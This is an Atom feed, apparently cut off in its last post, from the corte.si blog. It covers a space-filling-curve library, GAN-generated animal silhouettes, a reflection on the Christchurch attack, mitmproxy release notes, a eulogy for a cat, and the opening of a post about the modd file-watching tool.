{"title":"corte.si","link":[{"@attributes":{"href":"https:\/\/corte.si\/atom.xml","rel":"self","type":"application\/atom+xml"}},{"@attributes":{"href":"https:\/\/corte.si\/"}}],"updated":"2026-01-28T00:00:00+00:00","id":"https:\/\/corte.si\/atom.xml","entry":[{"title":"Spacecurve","published":"2026-01-28T00:00:00+00:00","updated":"2026-01-28T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/spacecurve\/announce\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/spacecurve\/announce\/","content":"<p>In 2024, I noticed that I'd let my blog languish. Since the issue was urgent, I\nmade a firm new year's resolution to address the situation in 2025. Which is\nwhy, today, in January 2026, I'm writing this post.<\/p>\n<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/spacecurve\">spacecurve<\/a>, a new\njust-for-fun space-filling curve project. It's is the latest symptom of a long\npreoccupation with these beautiuful mathematical objects. Over the years,\nthis preoccupation yielded blog posts like <a href=\"\/posts\/visualisation\/malware\/\">malware\nvisualisations<\/a>, a <a href=\"\/posts\/code\/hilbert\/portrait\/\">portrait of the Hilbert\ncurve<\/a> and tools like\n<a rel=\"external\" href=\"https:\/\/binvis.io\">binvis.io<\/a>. I have a long list of related ideas I never got\nto but have to wanted to explore, and the first step is naturally to... rewrite\nit in Rust. This is just a starting point, a base for exploring ideas I have\nabout visualisation, color spaces, and the qualities of the curves themselves.<\/p>\n<p>As part of the rewrite we now have fast base implementations of the curves\nthemselves in the <a rel=\"external\" href=\"https:\/\/crates.io\/spacecurve\">spacecurve<\/a> library, and a\nvisual exploration tool for 2D and 3D curves in the\n<a rel=\"external\" href=\"https:\/\/crates.io\/crates\/scurve\">scurve<\/a> command-line tool. Thanks to\n<a rel=\"external\" href=\"https:\/\/egui.rs\">egui<\/a>, the visualiser runs both natively and in the browser.<\/p>\n<p>Click through on the images below to see the web version.<\/p>\n<div class=\"media-grid media-stack\">\n<div class=\"media media-frame\">\n    <a href=\"&#x2F;spacecurve&#x2F;index.html\">\n        <img src=\".&#x2F;2d.png\" alt=\"2D rendering of Spacecurve\"  \/>\n    <\/a>\n\n    \n<\/div>\n<\/div>\n<div class=\"media-grid media-stack\">\n<div class=\"media media-frame\">\n    <a href=\"&#x2F;spacecurve&#x2F;index.html\">\n        <img src=\".&#x2F;3d.png\" alt=\"3D rendering of Spacecurve\"  \/>\n    <\/a>\n\n    \n<\/div>\n<\/div>\n<h2 id=\"installation\">Installation<\/h2>\n<p><strong>spacecurve<\/strong> is a Rust library for generating a variety of space-filling\ncurves, including Hilbert, Peano, Sierpinski, Moore, and Z-order curves.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">cargo<\/span><span style=\"color: #032F62;\"> add spacecurve<\/span><\/span><\/code><\/pre>\n<p><strong>scurve<\/strong> is a command-line tool for generating and visualizing space-filling\ncurves.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">cargo<\/span><span style=\"color: #032F62;\"> install scurve<\/span><\/span><\/code><\/pre>\n<p>It includes an egui interface for exploring the curves in 2D and 3D, which you\ncan run like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">scurve<\/span><span style=\"color: #032F62;\"> gui<\/span><\/span><\/code><\/pre><h2 id=\"spacecurve-web\">spacecurve web<\/h2>\n<p>Because egui supports webassembly, I've also deployed the egui app to the web.\nAccess it by clicking below, or on any of the images above.<\/p>\n<p><a href=\"\/spacecurve\/index.html\">Web Viewer<\/a><\/p>\n"},{"title":"Generative zoology with neural networks","published":"2020-06-30T00:00:00+00:00","updated":"2020-06-30T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/genzoo\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/genzoo\/","content":"<p>A couple of years ago a paper titled <em><a rel=\"external\" href=\"https:\/\/arxiv.org\/pdf\/1710.10196.pdf\">Progressive Growing of GANs for Improved\nQuality, Stability, and Variation<\/a><\/em>\ncropped up on my reading list. It describes growing <a rel=\"external\" href=\"https:\/\/en.wikipedia.org\/wiki\/Generative_adversarial_network\">generative adversarial\nnetworks<\/a>\nprogressively, starting with low-resolution images, and then building up more\ndetail as training goes on. It got quite a bit of press at the time because the\nauthors used their idea to generate realistic, unique images of human faces.<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;representative_image_512x256.png\">\n        <img src=\".&#x2F;representative_image_512x256.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Representative images from the <a href='https:\/\/github.com\/tkarras\/progressive_growing_of_gans'>Progressive GANs repo<\/a>\n    <\/div>\n    \n<\/div>\n<p>Looking at these images, it seems like the neural net would have to learn a vast\nnumber of things to be able to do what these networks were doing. Some of this\nseems relatively simple and factual - say, that eye colours should match. But\nother aspects are fantastically complex and hard to articulate. For instance,\nwhat nuances are needed to link the configuration of eyes, mouth and skin\ncreases into a coherent facial expression? Of course, I'm anthropomorphising a\nstatistical machine here, and we may be fooled by our intuition - it could turn\nout that there are relatively few working variations, and that the solution\nspace is more constrained than we imagine. Maybe the most interesting thing is\nnot the images themselves, but rather the uncanny effect they have on us.<\/p>\n<p>Some time later, a <a rel=\"external\" href=\"http:\/\/tetzoo.com\/podcast\">favourite podcast of mine<\/a>\nmentioned <a rel=\"external\" href=\"http:\/\/phylopic.org\/\">PhyloPic<\/a>, a database of silhouette images of\nanimals, plants and other lifeforms. Musing along the lines above, I wondered\nwhat would result if you trained a system like the one in the <strong>Progressive\nGANs<\/strong> paper on a very diverse dataset of this sort. Would you just generate\nmany variations of a few known animal types, or would there be enough variation\nto do neural-network driven <a rel=\"external\" href=\"https:\/\/blogs.scientificamerican.com\/tetrapod-zoology\/speculative-zoology-a-discussion\/\">speculative\nzoology<\/a>?\nHowever things played out, I was pretty sure I would get a few good prints for\nmy study wall out of it, so I set out to satisfy my curiosity with an attitude\nof open-minded experimentation.<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;animated.mp4\">\n        <video autoplay loop muted playsinline src=\".&#x2F;animated.mp4\"><\/video>\n    <\/a>\n    \n    <div class=\"subtitle\">\n        Training from random noise to competence\n    <\/div>\n    \n<\/div>\n<p>I adapted the <a rel=\"external\" href=\"https:\/\/github.com\/tkarras\/progressive_growing_of_gans\">code from the progressive GANs\npaper<\/a>, and trained a\nmodel for 12000 iterations using a Google Cloud instance with 8 NVIDA K80 GPUs\nover the complete PhyloPic dataset. Total training time, including some false\nstarts and experiments, was 4 days. I used the final trained model to produce\n50k individual images, and then spent hours poring over the results,\ncategorising, filtering and collating images. I also did some light editing by\nflipping images to orient creatures in the same direction, because I found this\na bit more visually satisfying. This hands-on approach means that what you see\nbelow is a sort of collaboration between me and the neural net - it did the\ncreative work, and I edited.<\/p>\n<div class=\"media\">\n    <a href=\"butterflies.png\">\n        <img src=\".&#x2F;butterflies-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Flying insects\n    <\/div>\n    \n<\/div>\n<p>The first surprising thing to me was how aesthetically pleasing the results\nwere. Much of this is certainly a reflection of the good taste of the artists\nwho produced the original data. However, there were also some happy accidents.\nFor instance, it seems that whenever the neural net enters uncertain territory -\nwhether it be fiddly bits that it hasn't quite mastered yet or complete flights\nof vaguely biological fantasy - chromatic aberrations begin to enter the\npicture. This is curious, because the input set is entirely in black and white,\nso colour cannot be a learned solution to some generative problem. Any colour\nmust necessarily be a pure artefact of the mind of the machine. Delightfully,\none of the things that consistently triggers chromatic aberrations are the wings\nof flying insects. This means that it generated hundreds and hundreds of\nvariations of evocatively-coloured \"butterflies\" like the ones above. I wonder\nif this could be a useful observation - if you train using only black-and-white\nimages, but demand output in full colour, splotches of colour might be a useful\nway to see where the model is still not able to accurately represent the\ntraining set.<\/p>\n<p>The bulk of the output is a huge variety of entirely recognisable silhouettes -\nbirds, various quadrupeds, reams of little gracile theropod dinosaurs,\nsauropods, fish, bugs, arachnids and humanoids.<\/p>\n<div class=\"media\">\n    <a href=\"birds.png\">\n        <img src=\".&#x2F;birds-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Birds\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"quadrupeds.png\">\n        <img src=\".&#x2F;quadrupeds-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Quadrupeds\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"dinos.png\">\n        <img src=\".&#x2F;dinos-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Dinosaurs\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"fish.png\">\n        <img src=\".&#x2F;fish-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Fish\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"bugs.png\">\n        <img src=\".&#x2F;bugs-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bugs\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"hominids.png\">\n        <img src=\".&#x2F;hominids-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Hominids\n    <\/div>\n    \n<\/div><h2 id=\"stranger-things\">Stranger things<\/h2>\n<p>Once the known critters have been weeded out, we get to stranger things. One of\nthe questions I had going into this was whether plausible animal body plans that\ndon't exist in nature would emerge - perhaps hybrids of the creatures in the\ninput set. Well, with careful search and a helpful touch of pareidolia, I found\nhundreds of quadrupedal birds, snake-headed deer and other fantastical\nmonstrosities.<\/p>\n<div class=\"media\">\n    <a href=\"mutants.png\">\n        <img src=\".&#x2F;mutants-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Monstrosities\n    <\/div>\n    \n<\/div>\n<p>Straying even further into the unkown, the model produced weird abstract\npatterns and unidentifiable entities, all with a vaguely biological, \"life-ish\"\nfeel to them.<\/p>\n<div class=\"media\">\n    <a href=\"fractals.png\">\n        <img src=\".&#x2F;fractals-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Abstract\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"interesting.png\">\n        <img src=\".&#x2F;interesting-small.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Unidentifiable\n    <\/div>\n    \n<\/div><h2 id=\"a-random-sample\">A random sample<\/h2>\n<p>What doesn't come through in the images above is the sheer abundance of\nvariation in the results. I'm having a number of these image sets printed and\nframed, and the effect of hundreds of small, detailed images side by side at\nscale is quite striking. To give some idea of the scope of the full dataset, I'm\nincluding one of these prints below - this one is a random sample from the\nunfiltered corpus of images.<\/p>\n<div class=\"media\">\n    <a href=\"large.png\">\n        <img src=\".&#x2F;large-small.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>"},{"title":"Some personal thoughts on our national tragedy","published":"2019-03-19T00:00:00+00:00","updated":"2019-03-19T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/personal\/tragedy\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/personal\/tragedy\/","content":"<div class=\"media\">\n    <a href=\".&#x2F;dunedin_mosque.jpg\">\n        <img src=\".&#x2F;dunedin_mosque.jpg\" alt=\"Outside the Al Huda Mosque\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Outside the Al Huda Mosque near my home (by\n            <a href=https:\/\/www.flickr.com\/photos\/mark_mcguire\/46492088665>Mark McGuire<\/a>)\n    <\/div>\n    \n<\/div>\n<p>A year ago, my wife and I decided to become citizens of New Zealand. Both of our\nsons were born here and are full, native Kiwis. It felt odd for our family not\nto have this in common, and besides, our own connection with New Zealand had\ngrown strong over the happy decade we'd lived here. It was time to take the\nplunge. Forms were filled in, interviews were held, and we were were notified\nthat our citizenship ceremony would be on the 8th of February, 2018.<\/p>\n<p>On the day, we were ushered into a hall with a podium and rows of slightly\nuncomfortable stackable chairs. By the time we arrived it was already full of\nour fellow soon-to-be Kiwis, along with their friends and family. Boisterous\nchildren resisted the shushing of their parents, and there was a bit of raucous\nrunning up and down the aisles. Nobody minded. The mood was friendly, expectant,\nand happy. We took our seats next to a young Chinese couple, and behind a family\nfrom the UK. Many were wearing splendid traditional dress from their countries\nof origin - Tongan, Chinese, Thai, Indian. I myself wore a business suit,\nsomething I only do under duress. The man in front of me's stiff posture and\noccasional collar-stretching finger showed I wasn't alone. We were all there\nwith common purpose - because we felt the need for a deeper commitment to our\nhome, and perhaps a deeper sense of acceptance in turn.<\/p>\n<p>A dapper, splendid-mustached gentleman took his place at the podium, and the\nhall became silent. He began the kind of speech you would expect: a speech of\nwelcome, about the rights and duties of citizenship, about the solemnity of the\nmoment. It was at this point, in that stuffy hall, in the middle of a somewhat\nmonotonous civil ceremony, that I was suddenly aware of a profound connection\nwith the people around me. I felt, with complete clarity, a golden thread\nlinking me to my wife, to the couple next to us, to the gent running the\nceremony, extending outwards to everyone in the room. I felt the presence of\ngenerations of parents, stretching back in time, working to better the lives of\ntheir families, all their individual journeys leading us here, to this hall at\nthis time. Most of all, I felt the presence of our children - all our children,\nthe children in the room and my children, and their children, and their\nchildren's children, all joined, facing the unknowable future. This built to a\nsort of vision: a great, thronging, thrusting, golden river of humanity,\nmeandering over a dark background. <em>All<\/em> of us together, everyone that has ever\nlived and everyone that ever will, shining ties binding us together each to\neach, all pushing ever forward in humanity's common project. For a moment\nbetween breaths, I was in touch with something transcendent, cosmically larger\nthan me, yet something of which my own small fleck of personhood was a necessary\npart.<\/p>\n<p>Afterwards, people congregated in happy, smiling groups, shaking hands and\nhugging, having their first conversations as full citizens. I slipped out the\ndoor at the back of the hall. My wife, who knows me best, followed, holding my\nhand and laughing with kind-hearted amusement at how moist-eyed and emotional I\nwas.<\/p>\n<p>That moment in the hall came back to me when I first read about the atrocity in\nChristchurch. I saw again the open, friendly, hopeful faces of my freshly-minted\nfellow citizens. I felt again the web of love that connects us all in\nfundamental unity. And I was suffused with an aching and overwhelming grief.\nGrief for the victims and their families, my countrymen and countrywomen. But\ngrief also that anyone could have a conception of humanity so small, so narrow,\nand so mean as to lead to an act like this.<\/p>\n<p>In the coming weeks I'll be doing my part in the business of reckoning with our\nnational tragedy, using the tools I have - code, data, and technology. We can\ndo much with these, but we can't go all the way. The real work will be to look\nagain at the human aspect our online communities, which, it has become\nterrifyingly clear, have become an obstacle to recognising our common purpose.<\/p>\n"},{"title":"mitmproxy v1.0.0: Christmas Edition","published":"2016-12-26T00:00:00+00:00","updated":"2016-12-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_1_0\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_1_0\/","content":"<div class=\"media\">\n    <a href=\"http:&#x2F;&#x2F;mitmproxy.org\">\n        <img src=\".&#x2F;mitmweb_1_0.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Six years after mitmproxy's first checkin, we've finally released version\n1.0.0 of the project. Our version numbering persisted below 1.0 well into\nthe project's maturity, for reasons that are a tad difficult to explain. My\nmental model of software development is of an eternal pilgrimage - the roadmap\nof possible improvements stretches on forever, and we never quite reach a point\nwhere we look back and feel that we've arrived. From this perspective, it makes\nsense for 1.0 to always be out of reach. Rather than adopting more\n<a rel=\"external\" href=\"http:\/\/www.tex.ac.uk\/FAQ-TeXfuture.html\">transcendental options<\/a>, I've stuck\nwith simply incrementing the minor version with each release. This release sees\ntwo changes in our process. First, we're committing to a much more regular\ncadence, aiming for a new release every two months or so (with minor bugfix and\npatch releases in between). Second, each of these releases will see a major\nversion number increment - this is v1.0, we'll release v2.0 by the end of\nFebruary, and so forth. This retains something of the flavor of our previous\neccentric version numbering strategy by de-emphasizing major version increments\nas flagfall events, without being as restrictive. Let the pilgrimage continue.<\/p>\n<p>The project's momentum continues to be excellent - since the last release,\nwe've had 459 commits by 10 contributors, resulting in 104 closed issues and\n172 closed PRs, all in just over 70 days. All this activity has resulted in a\nnumber of very significant developments.<\/p>\n<p>Over the last year, we've done a huge amount of work converting the project\nfrom Python 2 to Python 3. Our previous release straddled the two versions,\nretaining compatibility with Python 2.7. This release is strictly Python3-only.\nWe are now well positioned to take full advantage of things like optional type\nchecking, the new asyncio module and the many small and large interface\nimprovements that Python 3 brings.<\/p>\n<p>Our user interfaces continue to improve by leaps and bounds. The console\ninterface now has a much cleaner core, sports a number of new features like\nflow ordering, and has seen significant speed improvements. We're also finally\nreleasing something we've been cooking up for quite a while - mitmweb, a web\ninterface to mitmproxy. It's doesn't have feature parity with the console tool\nyet, but we feel it's ready to step onto the stage as one of our primary\ninterfaces. Since mitmproxy console doesn't run on Windows (yet), mitmweb is\nthe best GUI option for our Windows users for now. We're also improving our\ndistribution mechanisms on Windows, with a new installer package kindly\nprovided by <a rel=\"external\" href=\"http:\/\/bitrock.com\/\">BitRock<\/a>. These two developments together\nmean much better support for our Windows users.<\/p>\n<p>At a protocol level, we're happy to announce that our support for Websockets is\nnow mature, and enabled by default. For the moment, the best way to interact\nwith Websockets traffic is to use our scripting mechanism - we will have\nsupport in the GUIs very soon. On the HTTP\/2 front, the news is mixed. We're\nvery happy with the quality of our own implementation of the protocol, but\nwe've discovered that some server implementations still have problems with\ncertain protocol edge cases. Over the last few months we found multiple bugs\naffecting some very prominent websites and CDNs. We are working closely with\nthe affected companies to get these issues fixed - but big wheels turn slowly,\nespecially when it comes to business-critical infrastructure, and all the\nneeded repairs haven't been rolled out yet. This has left us in a bit of a\nquandary - we know that fixes for these issues are imminent, and we believe\nthat the particular problems are idiosyncratic and shouldn't prompt a\nredevelopment of our core to make us bug-for-bug compatible. None the less, the\neffect is that mitmproxy's HTTP2 implementation will currently do unexpected\nthings when talking to large sites like Twitter and Reddit. We've decided to\ndisable HTTP\/2 by default for this release - you can explicitly re-enable it\nusing the <em>--http2<\/em> flag.<\/p>\n<p>Finally, if you're interested in hacking on mitmproxy, now is an excellent time\nto join us. Contributing is simple - pick one of the issues that we've tagged\nas <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\/issues?q=is%3Aissue+is%3Aopen+label%3Agood-first-contribution\">good first\ncontributions<\/a>,\njoin us on <a rel=\"external\" href=\"https:\/\/slack.mitmproxy.org\/\">Slack<\/a> to discuss your approach, and\nthen send a PR.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>All mitmproxy tools are now Python 3 only! We plan to support Python 3.5 and higher.<\/li>\n<li>Web-Based User Interface: Mitmproxy now offically has a web-based user\ninterface called mitmweb. We consider it stable for all features currently\nexposed in the UI, but it still misses a lot of mitmproxy\u2019s options.<\/li>\n<li>Windows Compatibility: With mitmweb, mitmproxy is now useable on Windows. We\nare also introducing an installer (kindly sponsored by BitRock) that\nsimplifies setup.<\/li>\n<li>Configuration: The config file format is now a single YAML file. In most cases,\nconverting to the new format should be trivial - please see the docs for\nmore information.<\/li>\n<li>Console: Significant UI improvements - including sorting of flows by\nsize, type and url, status bar improvements, much faster indentation for\nHTTP views, and more.<\/li>\n<li>HTTP\/2: Significant improvements, but is temporarily disabled by default\ndue to wide-spread protocol implementation errors on some large website<\/li>\n<li>WebSocket: The protocol implementation is now mature, and is enabled by\ndefault. Complete UI support is coming in the next release. Hooks for\nmessage interception and manipulation are available.<\/li>\n<li>A myriad of other small improvements throughout the project.<\/li>\n<\/ul>\n"},{"title":"mitmproxy v0.18","published":"2016-10-17T00:00:00+00:00","updated":"2016-10-17T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_18\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_18\/","content":"<p>We've just released <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\/releases\/tag\/v0.18.1\">mitmproxy\nv0.18<\/a>!  Since the\nlast release, the project has had 1399 commits by 40 contributors, resulting in\n217 closed issues and 305 closed PRs, all of this in just over 189 days.<\/p>\n<p>This release is notable for a number of reasons.<\/p>\n<p>First, it contains significant contributions from our three excellent\n<a rel=\"external\" href=\"https:\/\/developers.google.com\/open-source\/gsoc\/\">GSOC<\/a> students this year.\nShadab Zafar worked on Python 3 compatibility and a number of aspects of\nmitmproxy's core. Clemens Brunner and Jason Hao made major improvements to\nmitmweb, the upcoming web-based interface to mitmproxy. We loved working with\nthese guys, and hope that they will continue to hack on mitmproxy.<\/p>\n<p>Second, the project has seen some significant internal reorganisation.\nPreviously, we were split over three separate repositories (mitmproxy, netlib\nand pathod). Over time, the practical headaches of keeping everything\nsynchronised started taking a toll, and we decided to amalgamate it all in a\nsingle repo. The most immediate external effect is that installing mitmproxy\n(through, say, \"pip install mitmproxy\") now gets you all of the associated\ntools and libraries, including pathod and pathoc.<\/p>\n<p>Finally, 0.18 will be the last major version of mitmproxy compatible with\nPython 2. The next release will target Python 3.5 only, with all of the 2\/3\ncompatibility cruft stripped out. This is not a decision we took lightly - we\nhave a significant community of developers that have tools based on mitmproxy,\nand we realise this might be painful for some of them. We feel that being able\nto use the full features of Python 3.5 will make the transition worth it. If\nyou have a library or tool based on mitmproxy, you should start planning for a\nconversion now. We'd be very happy to help you navigate the transition, so feel\nfree to drop by the <a rel=\"external\" href=\"https:\/\/slack.mitmproxy.org\/\">Slack channel<\/a> to chat to\nthe dev team.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Python 3 Compatibility for mitmproxy and pathod (Shadab Zafar, GSoC 2016)<\/li>\n<li>Major improvements to mitmweb (Clemens Brunner &amp; Jason Hao, GSoC 2016)<\/li>\n<li>Internal Core Refactor: Separation of most features into isolated Addons<\/li>\n<li>Initial Support for WebSockets<\/li>\n<li>Improved HTTP\/2 Support<\/li>\n<li>Reverse Proxy Mode now automatically adjusts host headers and TLS Server Name Indication<\/li>\n<li>Improved HAR export<\/li>\n<li>Improved export functionality for curl, python code, raw http etc.<\/li>\n<li>Flow URLs are now truncated in the console for better visibility<\/li>\n<li>New filters for TCP, HTTP and marked flows.<\/li>\n<li>Mitmproxy now handles comma-separated Cookie headers<\/li>\n<li>Merge mitmproxy and pathod documentation<\/li>\n<li>Mitmdump now sanitizes its console output to not include control characters<\/li>\n<li>Improved message body handling for HTTP messages:\n<ul>\n<li>.raw_content provides the message body as seen on the wire<\/li>\n<li>.content provides the decompressed body (e.g. un-gzipped)<\/li>\n<li>.text provides the body decompressed and decoded body<\/li>\n<\/ul>\n<\/li>\n<li>New HTTP Message getters\/setters for cookies and form contents.<\/li>\n<li>Add ability to view only marked flows in mitmproxy<\/li>\n<li>Improved Script Reloader (Always use polling, watch for whole directory)<\/li>\n<li>Use tox for testing<\/li>\n<li>Unicode support for tnetstrings<\/li>\n<li>Add dumpfile converters for mitmproxy versions 0.11 and 0.12<\/li>\n<li>Numerous bugfixes<\/li>\n<\/ul>\n<h2 id=\"contributors-for-this-release\">Contributors for this release<\/h2>\n<ul>\n<li>Aldo Cortesi<\/li>\n<li>Angelo Agatino Nicolosi<\/li>\n<li>BSalita<\/li>\n<li>Brett Randall<\/li>\n<li>Christian Frichot<\/li>\n<li>Clemens Brunner<\/li>\n<li>Cory Benfield<\/li>\n<li>Doug Freed<\/li>\n<li>Drake Caraker<\/li>\n<li>Felix Yan<\/li>\n<li>Israel Blancas<\/li>\n<li>Jason<\/li>\n<li>Jason Pepas<\/li>\n<li>Jonathan Jones<\/li>\n<li>Kostya Esmukov<\/li>\n<li>Linmiao Xu<\/li>\n<li>Manish Kumar<\/li>\n<li>Maximilian Hils<\/li>\n<li>Ryan Laughlin<\/li>\n<li>Sachin Kelkar<\/li>\n<li>Sanchit Sokhey<\/li>\n<li>Schamper<\/li>\n<li>Shadab Zafar<\/li>\n<li>Steven Noble<\/li>\n<li>Steven Van Acker<\/li>\n<li>Tai Dickerson<\/li>\n<li>Thomas Kriechbaumer<\/li>\n<li>Tyler St. Onge<\/li>\n<li>Vincent Haupert<\/li>\n<li>Wes Turner<\/li>\n<li>Yoginski<\/li>\n<li>Zohar Lorberbaum<\/li>\n<li>arjun<\/li>\n<li>chhsiao<\/li>\n<li>jpkrause<\/li>\n<li>phackt<\/li>\n<li>redfast<\/li>\n<li>smill<\/li>\n<li>strohu<\/li>\n<li>vulnminer<\/li>\n<\/ul>\n"},{"title":"Hobbes","published":"2016-03-22T00:00:00+00:00","updated":"2016-03-22T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/personal\/hobbes\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/personal\/hobbes\/","content":"<div class=\"media\">\n    <a href=\".&#x2F;hobbes.jpg\">\n        <img src=\".&#x2F;hobbes.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Eight years ago my wife and I walked into the <a rel=\"external\" href=\"https:\/\/www.catprotection.org.au\/\">Cat Protection\nSociety<\/a> near our house in Sydney on a whim -\njust to look, we assured each other, and <em>most definitely<\/em> not to get another\ncat. Thirty minutes later we emerged with a box containing a tiny ball of\nscraggly orange fluff, a wee kitten we immediately named Hobbes. Circumstances\nhad taken Hobbes away his mother far too early, and since I was able to work\nfrom home at the time the job of playing surrogate largely fell to me. I fed\nhim, let him perch on my shoulder like a fluffy little malodorous parrot while\nI worked, and cleaned him with a cotton bud after his inept attempts to use the\nlitter tray. He grew from a tiny scrap to a mischievous and energetic kitten,\nand then to a somewhat slothful but very handsome boy. Perhaps because he came\nto us so young, Hobbes never got on with other cats. He preferred the company\nof humans, and considered himself to be as much of a person as anyone else. The\nphoto above is him in his natural habitat: draped bonelessly over my lap like a\npurring orange throw-rug, just being part of whatever conversation his humans\nare having.<\/p>\n<p>About a year ago, Hobbes started losing weight. Truth be told shedding a few\npounds would probably have done him good, but this was unexplained by any\nchange in his diet. After a series of X-rays and a biopsy we got bad news: he\nhad lymphoma. With chemotherapy he would have a year or so of high-quality life\nleft, but likely not much more. Apart from giving him his daily pills, there\nwas not much we could do. We treated him to his favorite food as often as\nseemed sensible, and watched carefully for the moment when the scales tipped\nand discomfort outweighed the joy in his life.<\/p>\n<p>This morning Zoe and I took Hobbes to the vet one last time. He always hated\nbeing in the cat carrier, and would pace, tense and wide-eyed, ready to spring\nout like a jack-in-the-box when we opened the door. Today, he just seemed tired\nand sore, huddled motionlessly in an uncomfortable-looking crouch. We held him\ntogether as the vet gave him two injections - one to send him gently to sleep,\nand shortly after, another to stop his heart. Afterwards we brought him home\nand buried him under a cherry tree in our garden. Perhaps when spring comes, it\nwill flower orange.<\/p>\n<p>Goodbye, Hobbesy. Your family will miss you. You were a good, good boy.<\/p>\n"},{"title":"modd: a flexible tool for responding to filesystem change","published":"2016-02-11T00:00:00+00:00","updated":"2016-02-11T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/modd\/announce\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/modd\/announce\/","content":"<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/modd\">modd<\/a>, a new<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup> project of\nmine. Like its sister project <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">devd<\/a>, it's\ndistributed as a single, self-contained binary for all major platforms - <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/modd\/releases\">get it\nwhile it's fresh<\/a>.<\/p>\n<p>Modd is a simple tool that's hard to explain pithily. It triggers commands and\nmanages daemons in response to filesystem changes - but that is a\ntechnically-correct mouthful that doesn't really convey how it is used. Part of\nthe problem is that it is extremely flexible. In my projects it runs linters,\ndoes live code compiles, manages infrastructure daemons like databases, runs\ntest instances of projects and is even rendering and live-reloading this blog\npost as I type. Modd replaces parts of tools like <a rel=\"external\" href=\"http:\/\/gulpjs.com\/\">Gulp<\/a>,\n<a rel=\"external\" href=\"http:\/\/gruntjs.com\/\">Grunt<\/a>, <a rel=\"external\" href=\"https:\/\/ddollar.github.io\/foreman\/\">Foreman<\/a> and\n<em>make<\/em>, but it can also augment them. For instance, one of my projects is\nentirely driven by a Makefile, with tasks invoked by modd on change.<\/p>\n<p>At modd's core is a a file change detection library that tries to get things\nright for most developer work patterns. It handles temporary files, VCS\ndirectories and many <a rel=\"external\" href=\"https:\/\/twitter.com\/cortesi\/status\/661316050542329856\">pathological behaviors shown by common\neditors<\/a> correctly (or\nat least tries really hard to). The change detection algorithm waits for a lull\nin activity, so that jobs aren't triggered in the middle of progressive\nprocesses like renders and compiles that may touch many files. The result is\nchange detection that is less surprising and more consistent than similar\nprojects out there. The output of the change detection algorithm is then hooked\nup to a very flexible way to specify commands and manage daemons, letting you\nspecify shell scripts that trigger on file match patterns in a single config\nfile. Finally, there are a few mod-cons. A custom <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/termlog\">terminal logging\nmodule<\/a> lets modd sensibly interleave the\noutput of possibly concurrent daemons and commands, with headings showing which\ncommand was responsible for what. Modd also has support for desktop\nnotifications (<a rel=\"external\" href=\"http:\/\/growl.info\/\">Growl<\/a> on OSX,\n<a rel=\"external\" href=\"https:\/\/developer.gnome.org\/libnotify\/\">libnotify<\/a> on Linux), letting you see\nthings like linter output and compile editors immediately.<\/p>\n<p>Below, I'm going to show one quick example of how I use modd to do a live\nbuild\/compile cycle for <a 